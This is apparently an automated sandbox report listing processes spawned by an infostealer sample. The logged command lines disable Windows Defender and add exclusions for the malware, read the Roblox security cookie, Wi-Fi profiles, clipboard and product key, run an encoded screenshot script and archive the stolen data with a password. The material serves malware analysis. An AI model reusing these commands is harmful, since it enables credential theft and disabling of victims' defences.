Source: El9HaBFrFM.exe	String found in binary or memory: --help
Source: El9HaBFrFM.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: El9HaBFrFM.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: El9HaBFrFM.exe	String found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
Source: El9HaBFrFM.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: El9HaBFrFM.exe	String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
Source: El9HaBFrFM.exe	String found in binary or memory: can't send non-None value to a just-started coroutine

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

File read: C:\Users\user\Desktop\El9HaBFrFM.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"	Jump to behavior
